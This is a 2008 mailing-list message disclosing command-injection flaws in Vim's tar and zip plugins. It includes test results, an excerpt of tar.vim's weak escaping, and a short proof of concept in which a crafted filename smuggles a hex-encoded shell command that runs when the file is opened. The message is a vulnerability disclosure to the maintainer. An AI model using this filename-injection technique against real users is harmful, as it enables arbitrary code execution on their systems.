On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram@moolenaar.net> wrote: > > Jan Minar wrote: > >> 1. Summary >> >> Product : Vim -- Vi IMproved >> Version : Tested with 7.1.314 and 6.4 >> Impact : Arbitrary code execution >> Wherefrom: Local and remote >> Original : http://www.rdancer.org/vulnerablevim.html >> >> Improper quoting in some parts of Vim written in the Vim Script can lead to >> arbitrary code execution upon opening a crafted file. > Note that version 7.1.314, as reported in the Summary, does not have > most of the reported problems. The problems in the plugins have also > been fixed, this requires updating the runtime files. Information about > that can be found at http://www.vim.org/runtime.php I do apologize: as written in the advisory, the version I worked with was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have updated the advisory at http://www.rdancer.orgvulnerablevim.html . Thanks to Bram for all the good work. 7.2a.10 with updated runtime is still vulnerable to the zipplugin attack, and an updated tarplugin attack: ------------------------------------------- -------- Test results below --------------- ------------------------------------------- filetype.vim strong : EXPLOIT FAILED weak : EXPLOIT FAILED tarplugin : EXPLOIT FAILED tarplugin.updated: VULNERABLE zipplugin : VULNERABLE xpm.vim xpm : EXPLOIT FAILED xpm2 : EXPLOIT FAILED remote : EXPLOIT FAILED gzip_vim : EXPLOIT FAILED netrw : EXPLOIT FAILED The original tarplugin exploit now produces a string of telling error messages: /bin/bash: so%: command not found tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory tar: Error is not recoverable: exiting now /bin/bash: retu: command not found /bin/bash: bar.tar|retu|'bar.tar: command not found It's easy to see that it is still possible to execute arbitrary shell commands. $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10: 136 if tarfile =~# '\.\(gz\|tgz\)$' 137 " call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ") *138 exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - " 139 elseif tarfile =~# '\.lrp' 140 " call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ") *141 exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - " 142 elseif tarfile =~# '\.bz2$' 143 " call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ") *144 exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - " 145 else 146 " call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)) **147 exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile) [...] 444 fun s:Escape(name) 445 " shellescape() was added by patch 7.0.111 446 if exists("*shellescape") 447 let qnameq= shellescape(a:name) 448 else 449 let qnameq= g:tar_shq . a:name . g:tar_shq 450 endif 451 return qnameq 452 endfun (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends. (**) tar(1) allows arbitrary command execution via options ``--to-command'', and ``--use-compress-program''. The updated tarplugin attack is rather simple: $ rm -rf ./* $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar" $ vim +:q ./foo* $ ls -l pwned -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned Cheers, Jan Minar.